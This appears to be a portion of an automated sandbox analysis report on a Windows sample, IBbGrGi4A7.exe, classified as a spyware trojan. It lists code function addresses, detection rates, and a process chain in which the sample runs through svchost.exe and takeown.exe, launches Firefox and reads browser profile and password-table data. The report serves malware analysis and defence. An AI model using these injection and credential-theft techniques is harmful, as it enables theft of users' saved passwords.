                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004028701_2_00402870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040F8F31_2_0040F8F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042E8B31_2_0042E8B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004011D01_2_004011D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041634F1_2_0041634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004163531_2_00416353
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DB031_2_0040DB03
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FB131_2_0040FB13
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004043941_2_00404394
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DC471_2_0040DC47
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DC531_2_0040DC53
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004025501_2_00402550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402D701_2_00402D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417E771_2_00417E77
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FA3521_2_037FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038003E61_2_038003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E3F01_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E02741_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C02C01_2_037C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C81581_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038001AA1_2_038001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DA1181_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037301001_2_03730100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F81CC1_2_037F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F41A21_2_037F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D20001_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037407701_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037647501_2_03764750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373C7C01_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375C6E01_2_0375C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038005911_2_03800591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037405351_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F24461_2_037F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E44201_2_037E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EE4F61_2_037EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FAB401_2_037FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F6BD71_2_037F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA801_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037569621_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0380A9A61_2_0380A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A01_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374A8401_2_0374A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037428401_2_03742840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E8F01_2_0376E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037268B81_2_037268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B4F401_2_037B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03760F301_2_03760F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E2F301_2_037E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03782F281_2_03782F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374CFE01_2_0374CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03732FC81_2_03732FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BEFA01_2_037BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740E591_2_03740E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FEE261_2_037FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FEEDB1_2_037FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03752E901_2_03752E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FCE931_2_037FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DCD1F1_2_037DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374AD001_2_0374AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373ADE01_2_0373ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03758DBF1_2_03758DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740C001_2_03740C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03730CF21_2_03730CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0CB51_2_037E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372D34C1_2_0372D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F132D1_2_037F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0378739A1_2_0378739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E12ED1_2_037E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375B2C01_2_0375B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037452A01_2_037452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372F1721_2_0372F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0377516C1_2_0377516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374B1B01_2_0374B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0380B16B1_2_0380B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F70E91_2_037F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FF0E01_2_037FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EF0CC1_2_037EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037470C01_2_037470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FF7B01_2_037FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037856301_2_03785630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F16CC1_2_037F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F75711_2_037F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DD5B01_2_037DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037314601_2_03731460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FF43F1_2_037FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FFB761_2_037FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B5BF01_2_037B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0377DBF91_2_0377DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375FB801_2_0375FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B3A6C1_2_037B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FFA491_2_037FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F7A461_2_037F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EDAC61_2_037EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DDAAC1_2_037DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03785AA01_2_03785AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E1AA31_2_037E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037499501_2_03749950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375B9501_2_0375B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D59101_2_037D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AD8001_2_037AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037438E01_2_037438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FFF091_2_037FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FFFB11_2_037FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03741F921_2_03741F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03749EB01_2_03749EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F7D731_2_037F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F1D5A1_2_037F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03743D401_2_03743D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375FDC01_2_0375FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B9C321_2_037B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FFCF21_2_037FFCF2
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeCode function: 2_2_04C577F12_2_04C577F1
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeCode function: 2_2_04C767B12_2_04C767B1
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeCode function: 2_2_04C600312_2_04C60031
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeCode function: 2_2_04C4C2922_2_04C4C292
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeCode function: 2_2_04C5E24D2_2_04C5E24D
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeCode function: 2_2_04C5E2512_2_04C5E251
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeCode function: 2_2_04C55A012_2_04C55A01
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeCode function: 2_2_04C57A112_2_04C57A11
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeCode function: 2_2_04C55B452_2_04C55B45
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeCode function: 2_2_04C55B512_2_04C55B51
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FF02C03_2_02FF02C0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_0302A3523_2_0302A352
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_030303E63_2_030303E6
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F7E3F03_2_02F7E3F0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_030102743_2_03010274
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_0300A1183_2_0300A118
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_030241A23_2_030241A2
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_030301AA3_2_030301AA
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_030281CC3_2_030281CC
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_030020003_2_03002000
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FF81583_2_02FF8158
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F601003_2_02F60100
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F8C6E03_2_02F8C6E0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F6C7C03_2_02F6C7C0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F707703_2_02F70770
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F947503_2_02F94750
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_030305913_2_03030591
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_030144203_2_03014420
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_030224463_2_03022446
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F705353_2_02F70535
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_0301E4F63_2_0301E4F6
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_0302AB403_2_0302AB40
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F6EA803_2_02F6EA80
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_03026BD73_2_03026BD7
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F9E8F03_2_02F9E8F0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F568B83_2_02F568B8
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_0303A9A63_2_0303A9A6
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F728403_2_02F72840
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F7A8403_2_02F7A840
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F729A03_2_02F729A0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F869623_2_02F86962
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_03012F303_2_03012F30
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F82E903_2_02F82E90
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F70E593_2_02F70E59
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F7CFE03_2_02F7CFE0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_0302EE263_2_0302EE26
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F62FC83_2_02F62FC8
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FEEFA03_2_02FEEFA0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_0302CE933_2_0302CE93
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FE4F403_2_02FE4F40
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F90F303_2_02F90F30
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FB2F283_2_02FB2F28
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_0302EEDB3_2_0302EEDB
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F60CF23_2_02F60CF2
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_0300CD1F3_2_0300CD1F
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F70C003_2_02F70C00
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F6ADE03_2_02F6ADE0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F88DBF3_2_02F88DBF
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_03010CB53_2_03010CB5
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F7AD003_2_02F7AD00
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_0302132D3_2_0302132D
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F8B2C03_2_02F8B2C0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F752A03_2_02F752A0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FB739A3_2_02FB739A
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F5D34C3_2_02F5D34C
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_030112ED3_2_030112ED
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F770C03_2_02F770C0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_0303B16B3_2_0303B16B
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F7B1B03_2_02F7B1B0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F5F1723_2_02F5F172
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA516C3_2_02FA516C
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_0301F0CC3_2_0301F0CC
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_0302F0E03_2_0302F0E0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_030270E93_2_030270E9
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_0302F7B03_2_0302F7B0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_030216CC3_2_030216CC
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_030275713_2_03027571
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F614603_2_02F61460
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_0300D5B03_2_0300D5B0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_0302F43F3_2_0302F43F
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FB5AA03_2_02FB5AA0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_0302FB763_2_0302FB76
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FE3A6C3_2_02FE3A6C
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FADBF93_2_02FADBF9
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FE5BF03_2_02FE5BF0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_03027A463_2_03027A46
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_0302FA493_2_0302FA49
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F8FB803_2_02F8FB80
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_03011AA33_2_03011AA3
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_0300DAAC3_2_0300DAAC
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_0301DAC63_2_0301DAC6
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_030059103_2_03005910
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F738E03_2_02F738E0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FDD8003_2_02FDD800
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F799503_2_02F79950
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F8B9503_2_02F8B950
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_0302FF093_2_0302FF09
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F79EB03_2_02F79EB0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_0302FFB13_2_0302FFB1
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F71F923_2_02F71F92
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_03021D5A3_2_03021D5A
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_03027D733_2_03027D73
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FE9C323_2_02FE9C32
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F8FDC03_2_02F8FDC0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F73D403_2_02F73D40
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_0302FCF23_2_0302FCF2
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02581AA03_2_02581AA0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_0257AB103_2_0257AB10
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_0257CB203_2_0257CB20
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_0257C9003_2_0257C900
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_0257AC543_2_0257AC54
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_0257AC603_2_0257AC60
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_0258335C3_2_0258335C
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_025833603_2_02583360
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_025713A13_2_025713A1
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_025851403_2_02585140
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_0259B8C03_2_0259B8C0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02DCE2153_2_02DCE215
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02DCE0F83_2_02DCE0F8
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02DCD6783_2_02DCD678
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02DCE5AC3_2_02DCE5AC
                Source: C:\Windows\SysWOW64\takeown.exeCode function: String function: 02FB7E54 appears 102 times
                Source: C:\Windows\SysWOW64\takeown.exeCode function: String function: 02FEF290 appears 105 times
                Source: C:\Windows\SysWOW64\takeown.exeCode function: String function: 02FDEA12 appears 86 times
                Source: C:\Windows\SysWOW64\takeown.exeCode function: String function: 02F5B970 appears 280 times
                Source: C:\Windows\SysWOW64\takeown.exeCode function: String function: 02FA5130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03775130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03787E54 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0372B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037AEA12 appears 86 times
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: String function: 00338900 appears 42 times
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: String function: 00317DE1 appears 35 times
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: String function: 00330AE3 appears 70 times
                Source: IBbGrGi4A7.exe, 00000000.00000003.866350607.00000000038A3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs IBbGrGi4A7.exe
                Source: IBbGrGi4A7.exe, 00000000.00000003.868713689.0000000003A9D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs IBbGrGi4A7.exe
                Source: IBbGrGi4A7.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@8/7
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_0037A06A GetLastError,FormatMessageW,0_2_0037A06A
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_003681CB AdjustTokenPrivileges,CloseHandle,0_2_003681CB
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_003687E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_003687E1
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_0037B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0037B333
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_0038EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0038EE0D
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_003883BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_003883BB
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_00314E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00314E89
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeFile created: C:\Users\user~1\AppData\Local\Temp\aut484B.tmpJump to behavior
                Source: IBbGrGi4A7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: takeown.exe, 00000003.00000002.3328687494.0000000002AA7000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000003.00000003.1259185902.0000000002AA7000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000003.00000003.1259185902.0000000002A72000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000003.00000002.3328687494.0000000002A72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: IBbGrGi4A7.exeReversingLabs: Detection: 68%
                Source: IBbGrGi4A7.exeVirustotal: Detection: 73%
                Source: unknownProcess created: C:\Users\user\Desktop\IBbGrGi4A7.exe "C:\Users\user\Desktop\IBbGrGi4A7.exe"
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\IBbGrGi4A7.exe"
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeProcess created: C:\Windows\SysWOW64\takeown.exe "C:\Windows\SysWOW64\takeown.exe"
                Source: C:\Windows\SysWOW64\takeown.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\IBbGrGi4A7.exe"Jump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeProcess created: C:\Windows\SysWOW64\takeown.exe "C:\Windows\SysWOW64\takeown.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeSection loaded: windowscodecs.dllJump to behavior
